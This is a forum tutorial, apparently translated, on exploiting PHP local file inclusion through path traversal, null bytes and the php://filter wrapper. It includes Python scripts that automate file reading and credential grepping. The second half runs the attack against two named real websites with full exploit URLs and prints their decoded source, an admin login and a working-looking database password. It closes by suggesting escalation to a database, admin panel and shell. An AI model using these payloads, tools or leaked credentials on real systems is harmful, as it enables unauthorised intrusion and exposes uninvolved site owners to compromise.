dancezar

LFI to Source Code Disclosure
In this tutorial you will learn the php://filter method for exploiting an LFI.

What LFI is:

LFI (Local File Inclusion) is the improper use of PHP's include() function: the path it receives comes from user input, so through an LFI we can include (not just fetch the page source, but actually include) and execute the PHP code of any file on the server.

How to find an LFI:

An LFI usually shows up in this form: site.com/index.php?page=ceva.php. If we append something to it, for example site.com/index.php?page=ceva.php; we get an error like:

[Screenshot lfi2.png: http://s24.postimg.org/u93f51bth/lfi2.png]

The error says that PHP cannot include a file that does not exist. Using ../ (one directory up) we can walk through the folders and include any file on the server: site.com/index.php?page=../etc/passwd. How many ../ you need depends on how deep the web root sits in the filesystem; extra ones do no harm (/../ at the root stays at the root), so in practice you start with several, e.g. ../../../../etc/passwd, and adjust from there.

Using the null byte:

It is used when the PHP script appends an extension (usually .php, .html or .txt) to the parameter it takes. The null byte %00 "cancels" the extension that follows the parameter and is used like this: site.com/index.php?page=../etc/passwd%00. Keep in mind that this only works on PHP older than 5.3.4; newer versions refuse to open a path containing a null byte, so the include simply fails instead of being truncated.
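As an added example that is not part of the original tutorial: the find-and-confirm step above (traversal at increasing depth, then %00 when the script appends an extension) written as a small Python checker. The target, parameter name, web root depth and the PHP null-byte behaviour are all modelled by a constructed mock server, not a real site; against a real target you would pass a function that performs the HTTP request in place of the mock.

```python
import posixpath
import re
from typing import Callable, Dict, Optional
from urllib.parse import parse_qs, urlparse

# A successful read of /etc/passwd always contains the root entry.
PASSWD_SIGNATURE = re.compile(r"^root:[^:]*:0:0:", re.M)


def traversal_payloads(target="etc/passwd", max_depth=8, null_byte=True):
    """Yield (depth, payload): ../ chains of increasing depth, each also with %00."""
    for depth in range(1, max_depth + 1):
        path = "../" * depth + target
        yield depth, path
        if null_byte:
            yield depth, path + "%00"


def find_lfi(base_url: str, param: str, fetch: Callable[[str], str], **kwargs) -> Optional[Dict]:
    """Try each payload through `fetch` and return the first one that leaks /etc/passwd."""
    for depth, payload in traversal_payloads(**kwargs):
        url = f"{base_url}?{param}={payload}"   # sent raw: %00 must reach the server as-is
        if PASSWD_SIGNATURE.search(fetch(url)):
            return {"depth": depth, "payload": payload, "url": url}
    return None


def make_mock_server(appends_extension: bool, null_byte_truncates: bool, webroot="/var/www/html"):
    """Constructed stand-in for a vulnerable index.php (not a real target).

    appends_extension   -> the script does include($page . ".php")
    null_byte_truncates -> PHP < 5.3.4 behaviour; newer PHP rejects paths with NUL
    """
    fake_fs = {
        "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                       "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
        f"{webroot}/home.php": "<h1>home</h1>",
    }

    def fetch(url: str) -> str:
        page = parse_qs(urlparse(url).query).get("page", [""])[0]  # parse_qs turns %00 into "\x00"
        if appends_extension:
            page += ".php"
        if "\x00" in page:
            if not null_byte_truncates:
                return "Warning: include(): Filename contains null byte"
            page = page.split("\x00", 1)[0]          # C-string semantics of old PHP
        resolved = posixpath.normpath(posixpath.join(webroot, page))  # extra ../ above / collapse
        return fake_fs.get(resolved, f"Warning: include({resolved}): failed to open stream: "
                                     "No such file or directory")

    return fetch


if __name__ == "__main__":
    for ext, nul in [(False, True), (True, True), (True, False)]:
        hit = find_lfi("http://site.com/index.php", "page", make_mock_server(ext, nul))
        print(f"appends .php={ext}, null byte truncates={nul}: {hit and hit['payload']}")
```

The three runs in the main block show the three situations from the text: no extension appended (plain traversal works at depth 3), extension appended on old PHP (only the %00 variant works), and extension appended on PHP 5.3.4 or newer (nothing works, and you have to fall back to files that already end in that extension).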

Now that we have had a short introduction to the term LFI, I will present the php://filter method.

Let's suppose you have an LFI in a site: you can pull /etc/passwd, but you cannot find any log file, and the php://input method does not work. One more way of exploiting the LFI remains: the php://filter method.

With this method we can turn an LFI into a source code disclosure, that is, we can read the source of the files on the server.

We have the following LFI: site.com/index.php?page=../etc/passwd

[Screenshot lfi1.png: http://s9.postimg.org/ipogmj0gf/lfi1.png]

Let's suppose we have no access to logs and cannot turn the LFI into remote code execution; we will try the php://filter method.

The php://filter method is used like this: site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER

Where FISIER is the name of the file you want to read. What does php://filter/convert.base64-encode/resource=FISIER do? It tells include() to take the contents of FISIER, pass them through the base64-encode filter and hand back the result. Because what comes back is base64 text and not PHP code, the interpreter has nothing to execute and just prints it, which is why we get the source instead of the rendered page. This works only on scripts whose entry point is include() (or require(), include_once(), require_once()), and only when nothing is prepended to the injected parameter: php:// is a stream wrapper and is recognised only at the very start of the path, so a script like include('pages/'.$_REQUEST['page']) cannot be exploited this way because the wrapper ends up in the middle of the string. If the script appends an extension instead, it becomes part of the resource name (resource=FISIER.php), and you are back to the null byte situation above.

The result is the following; here I read the index.php file itself:

[Screenshot lfi3.png: http://s24.postimg.org/hx9pj12qd/lfi3.png]

The page gives us the source of the file encoded in base64, and with any base64 decoder we get the source back.
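As an added example, not code from the original post: the manual loop described above (request the php://filter URL, pull the base64 out of the page, decode it, look for include() lines, repeat) automated in Python. The site, file names and credentials below are constructed, and the fetch function is a mock that also models the include('pages/'.$page) case in which the wrapper never fires; a real run would replace the mock with an HTTP client.

```python
import base64
import posixpath
import re
from typing import Callable, Dict, List, Optional
from urllib.parse import parse_qs, urlparse

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="
# Static include/require targets: include("user.php"), require_once ('admin/x.class'), ...
INCLUDE_RE = re.compile(r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")
# The leaked source shows up as one long base64 run somewhere in the HTML.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def filter_payload(resource: str) -> str:
    return FILTER_PREFIX + resource


def extract_source(html: str) -> Optional[str]:
    """Decode the longest base64 run in the response, or None if the read failed."""
    blobs = B64_RE.findall(html)
    if not blobs:
        return None
    return base64.b64decode(max(blobs, key=len)).decode("latin-1")


def find_includes(source: str, including_file: str) -> List[str]:
    """Static include targets, resolved relative to the directory of the including file."""
    base = posixpath.dirname(including_file)
    targets = []
    for path in INCLUDE_RE.findall(source):
        if "://" in path or "$" in path:      # wrappers and dynamic includes: skip
            continue
        targets.append(posixpath.normpath(posixpath.join(base, path)))
    return targets


def walk(base_url: str, param: str, fetch: Callable[[str], str],
         start: str = "index.php", limit: int = 25) -> Dict[str, Optional[str]]:
    """Read `start` through php://filter, then every file it includes, breadth-first."""
    sources: Dict[str, Optional[str]] = {}
    queue = [start]
    while queue and len(sources) < limit:
        current = queue.pop(0)
        if current in sources:
            continue
        source = extract_source(fetch(f"{base_url}?{param}={filter_payload(current)}"))
        sources[current] = source
        if source:
            queue.extend(t for t in find_includes(source, current) if t not in sources)
    return sources


def find_credentials(sources: Dict[str, Optional[str]]) -> Dict[str, str]:
    """Grep the recovered sources for string assignments to user/pass-like variables."""
    pattern = re.compile(r"""\$(\w*(?:user|pass|pwd)\w*)\s*=\s*['"]([^'"]*)['"]""", re.I)
    hits = {}
    for filename, source in sources.items():
        for name, value in pattern.findall(source or ""):
            hits[f"{filename}:${name}"] = value
    return hits


# --- constructed stand-in for a vulnerable site (not a real target) -------------------
FAKE_FILES = {
    "index.php": '<?php\ninclude("user.php");\nrequire_once ("admin/db.class");\n'
                 '$page = $_REQUEST["page"];\nif ($page) { include($page); }\n?>\n<html>...</html>',
    "user.php": '<?php\n$user = "demo";\n$pass = "demo123";\n',
    "admin/db.class": '<?php\n$mysql_user = "app";\n$mysql_pass = "s3cret";\n',
}


def make_fetch(prefix: str = "") -> Callable[[str], str]:
    """prefix="" models include($page); prefix="pages/" models include('pages/'.$page)."""
    def fetch(url: str) -> str:
        page = prefix + parse_qs(urlparse(url).query).get("page", [""])[0]
        if page.startswith(FILTER_PREFIX):          # wrapper only recognised at the start
            target = page[len(FILTER_PREFIX):]
            if target in FAKE_FILES:
                encoded = base64.b64encode(FAKE_FILES[target].encode("latin-1")).decode()
                return f"<html><body>{encoded}</body></html>"
        return "<html><body>Warning: include(): failed to open stream</body></html>"
    return fetch


if __name__ == "__main__":
    recovered = walk("http://site.com/index.php", "page", make_fetch())
    for name, value in find_credentials(recovered).items():
        print(name, "=", value)
    print("with a path prefix:", walk("http://site.com/index.php", "page", make_fetch("pages/")))
```

The walker only follows includes whose path is a literal string; include($page) style lines are skipped because the file name is not known statically, which is exactly the line that gives us the LFI in the first place. With the "pages/" prefix the first request already comes back as an include error, which is the quickest way to tell that a given LFI will not yield to php://filter.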

Applicability:

What can be done with this method? :-/ Well, we can get hold of the login data for administration panels or for databases.

We have the following site: Sportstudio Bodyworld Schkeuditz bei Leipzig

[Screenshot lfi4.png: http://s23.postimg.org/ta0365agb/lfi4.png]

We test the php://filter method and read the source of index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig

[Screenshot lfi5.png: http://s21.postimg.org/x2fgrchg7/lfi5.png]

What we got back is the source encoded in base64. Decoded it is:

<?php
include("user.php");
$PHPSESSID = $_REQUEST["PHPSESSID"];
$page = $_REQUEST["page"];
$benutzername = $_REQUEST["benutzername"];
$passwort = $_REQUEST["passwort"];
$login = $_REQUEST["login"];
$logout = $_REQUEST["logout"];
$senden = $_REQUEST["senden"];
$datei = $_REQUEST["datei"];

If ($benutzername && $passwort)
    If ($benutzername === $user && $passwort === $pass) {
        session_start();
        header("Location: index.php?page=login.php&login=ok");
    }
    else {
        header("Location: index.php?page=login.php&login=falsch");
    }
else {
    If ($PHPSESSID) {
        session_start($PHPSESSID);
    }
}
If ($senden) {
    If ($senden=="Ja") {
        $bild = $_REQUEST["bild"];
        If ($bild) {
            @unlink("./news_pics/$bild");
        }
        @unlink($datei);
        header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
    elseif ($senden=="Nein") {
        header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei");
    }
}

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title>
<meta name="DC.Title" content="pc4user.de - webdesign - webtec">
<meta name="DC.Creator" content="Detlev Liebing">
<meta name="DC.Subject" content="Sport, Fitness, Fitness-Studio, Freizeit, Solarium, Sauna, Bodyworld, Sportstudio">
<meta name="DC.Description" content="pc4user.de - webdesign - webtec">
<meta name="DC.Publisher" content="pc4user">
<meta name="DC.Contributor" content="Detlev Liebing">
<meta name="DC.Date" content="2009-01-15">
<meta name="DC.Type" content="Text">
<meta name="DC.Format" content="text/html">
<meta name="DC.Identifier" content="http://www.pc4user.de">
<meta name="DC.Source" content="">
<meta name="DC.Language" content="de">
<meta name="DC.Relation" content="Startseite">
<meta name="DC.Coverage" content="Leipzig">
<meta name="DC.Rights" content="Alle Rechte liegen bei pc4user-Detlev Liebing">
<meta name="robots" content="index">
<meta name="robots" content="follow">
<meta name="keywords" lang="de" content="">
<meta name="keywords" lang="en-us" content="">
<meta name="keywords" lang="en" content="">
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<meta http-equiv="expires" content="0">
<link rel="stylesheet" href="style.css">
</head>

<body topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=990 height=239>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=990 height=33 colspan=2>
<!--- horizontale oberste hauptnavigation--->
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=150 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="150" height="33" border="0"></a></td>
<td width=84 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="84" height="33" border="0"></a></td>
<td width=111 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="111" height="33" border="0"></a></td>
<td width="647" background="gfx/oeffnungszeiten.jpg"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td width=563 height=206 background="gfx/mittelheaderlinks.jpg" valign=top>
<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td rowspan=4 width=443 height=170> </td>
<td width=120 height=79> </td>
</tr>
<tr>
<td width=120><a href="index.php?page=home.php"><img src="gfx/service.gif" alt="" width="121" height="23" border="0"></a></td>
</tr>
<tr>
<td width=120><a href="index.php?page=service.php"><img src="gfx/service.gif" alt="" width="121" height="32" border="0"></a></td>
</tr>
<tr><td width=120><a href="index.php?page=kontakte.php"><img src="gfx/kontakte.gif" alt="" width="121" height="36" border="0"></a></td>
</tr>
<tr>
<td colspan=2 width=563 height=36>
<!-- untere horizontale hauptnavi-->
<table width=563 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<td width=110><a href="index.php?page=home.php"><img src="gfx/home.gif" alt="" width="72" height="36" border="0"></a></td>
<td wuidth=72><a href="index.php?page=anfahrt.php"><img src="gfx/anfahrt.gif" alt="" width="110" height="36" border="0"></a></td>
<td width=127><a href="index.php?page=angebot.php"><img src="gfx/angebot.gif" alt="" width="115" height="36" border="0"></a></td>
<td width=140><a href="index.php?page=kontakt.php"><img src="gfx/kontakt.gif" alt="" width="127" height="36" border="0"></a></td>
<td width=115><a href="index.php?page=impressum.php"><img src="gfx/impressum.gif" alt="" width="140" height="36" border="0"></a></td>
</tr>
</table> </td>
</tr>
</table>
</td>
<!-- rechter headerteil mitte (logo)-->
<td width=427 height=206 background="gfx/mittelheaderrechts.jpg"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td height=71 width=990 style="background-image:url(gfx/unterheader.jpg); background-repeat:no-repeat" valign=top>
<table width=990 cellspacing=0 cellpadding=0 border=0 align=left>
<tr>
<!-- newsheader --->
<td width=400 height=71 valign="bottom">
<table id="ueber">
<tr>
<td width=190>
</td>
<td width=210>
News
</td>
</tr>
</table>
</td>
<!-- ueberschrift des jeweiligen inhaltes -->
<td width=590 align="left" valign="bottom">
<table id="ueber">
<tr>
<td width=30>
</td>
<td width=560>
<?php
include("ueberschriften.php");
?>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<!-- news --->
<td width=400 valign="top">
<!-- an dieser stelle php aus datenbank-->
<table>
<tr>
<td valign="top">
<?php include("news.php") ?>
</td>
</tr>
</table>
</td>
<!-- jeweiliger inhalt -->
<td width=590 valign="top">
<table width=590 id="main">
<tr>
<td width=45> 

</td>
<td valign="top" width=560>
<?php
If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; };
If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; };
If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") > 0) { $page="home.php"; };
If ($page) { include($page); }
else { include("home.php"); }
?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>

In the source we see the following line:

include("user.php");

We can also see why the wrapper got through: the script only falls back to home.php when the page value contains "http", "www" or "ftp", and php://filter/... contains none of them.

Now we read the user.php page: http://www.bodyworld-schkeuditz.de/index.php?page=php://filter/convert.base64-encode/resource=user.php

What we got:

PD9waHANCg0KICAkdXNlciA9ICJjYW1pYmIiOw0KICAkcGFzcyA9ICJjYW1pYmIiDQoNCg0K

Decoded:

<?php

  $user = "camibb";
  $pass = "camibb"

We go to the login.php page and log in with the data above (not much can be done there, it is only for the concept).

Another example: Impresariat Alwernia - Andrzej Grabowski Show

[Screenshot lfi6.png: http://s17.postimg.org/9q9g8rn7z/lfi6.png]

We read index.php: http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

[Screenshot lfi7.png: http://s27.postimg.org/5hgc3dkg3/lfi7.png]

What we got back is again the base64-encoded source. Decoded:

<head>
<TITLE>Impresariat Alwernia - Andrzej Grabowski Show</TITLE>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-2">
<META name="robots" content="index,follow,all">
<META name="revisit-after" content="2 days">
<META name="title" content="Impresariat Alwernia - Andrzej Grabowski Show">
<META name="keywords" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa"><!-- Alwernia, Grabowski -->
<META name="description" content="Andrzej Grabowski Show - Grabowscy.Com. Agencja impresaryjna Alwernia. Tylko najlepsze spektakle. Impresariat Alwernia - Andrzej Grabowski Show"><!-- Alwernia, Grabowski -->
<META name="abstract" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa">
<META name="author" content="Grabowski, Impresariat Alwernia, Andrzej Grabowski Show, Alwernia, Scenariusz dla 3 aktorów, Kwartet dla 4 aktorów, Schaeffer Bogusław, Agencja Impresaryjna, Agencja Artystyczna, Agencja Teatralno-Koncertowa">
<META HTTP-EQUIV="Content-Language" CONTENT="pl">

<script language="JavaScript" src="js/skrypt.js"></script>
<style type="text/css">
<!--
body {
    background-color: #355C91;
    margin-left: 0px;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
}
-->
</style></head>

<body>
<table class="tabelazewnetrzna" border=0 cellpadding=0 cellspacing=0>
<tr>
<td>
<TABLE border=0 class="tabelawewnetrzna" cellpadding=0 cellspacing=0>
<TR>
<TD colspan="3"><?include("header_center.htm")?></TD>
</TR>
<TR>
<td class="leftbackground" valign="top"><?include("left.htm")?></TD>
<td class="center" valign="top">
<?
// -----------------------------------------------------------------------------------------------------------------------------------------------------
require_once ("admin/data_base.class");
$connid = new DataBaseConnect();
// -----------------------------------------------------------------------------------------------------------------------------------------------------

include ('newsy/engine.php3');

$page = $_GET['page'];
$subpage = $_GET['subpage'];
$parent = $_GET['parent'];
$pid = $_GET['pid'];

if (!$page)
    include ('center.htm');
else
    if ($page == 'newsy' && $subpage == 'showall')
        include ('newsy/newsy.php3');
    else
        if ($page == 'newsy' && $subpage == 'show')
            include ('newsy/news.php3');
        else
            if ($page == 'strona')
                include ('newsy/strona.php3');
            else
                include ($page);
?>
</td>
<td class="rightbackground" valign="top"><?include("newsy/polecamy.php3")?></TD>
</TR>
<TR>
<td class="footerbackgroundleft"><?include("footer_left.htm")?></TD>
<td class="footerbackground"><?include("footer_center.htm")?></TD>
<td class="footerbackgroundright"><?include("footer_right.htm")?></TD>
</TR>
</table>
</td>
</tr>
</table>
</body>
</html>

What is interesting in the source is admin/data_base.class, so we read its source too: http://www.grabowscy.com/index.php?page=php://filter/convert.base64-encode/resource=admin/data_base.class

From there we got the base64-encoded class. Decoded:

<?
class DataBaseConnect
{
    var $mysqlidconn;
    var $databasename;
    var $results;
    var $tablename;

    function DataBaseConnect()
    {
        // $mysql_host = "localhost";
        // $mysql_user = "root";
        // $mysql_pass = "";

        $mysql_host = "localhost";
        $mysql_user = "grabowscy";
        $mysql_pass = "qHInJi4o";

        $mysql_db_name = "grabowscy";
        $nazwa_tabeli = "grabowscy_";

        $id_conn = @Mysql_select_db($mysql_db_name) or
            die('<span style="font-family: Verdana; font-size: 13px"><b>Problem z dostępem do bazy danych.</b>');

        $this -> mysqlidconn = $id_conn;
        $this -> databasename = $mysql_db_name;
        $this -> tablename = $nazwa_tabeli;
    }

    function CheckTableExists($table)
    {
        $this->results = mysql_db_query($this->databasename, "SELECT 1 FROM `$table` LIMIT 0", $this->mysqlidconn);
        return $this->results;
    }

    function QueryToDataBase($query)
    {
        $this->results = mysql_query($query) or
            die("Problem z dostępem do bazy danych. ".$query);
        return $this->results;
    }

}
?>

and voilà:

$mysql_user = "grabowscy";
$mysql_pass = "qHInJi4o";

$mysql_db_name = "grabowscy";

From here you can get access to the database, and from there to the administration panel and a shell :D.

These examples were given only to demonstrate the impact of the vulnerability.

That is all I had to say; I hope the tutorial was useful to you.

Have a good day :D.

Edited by danyweb09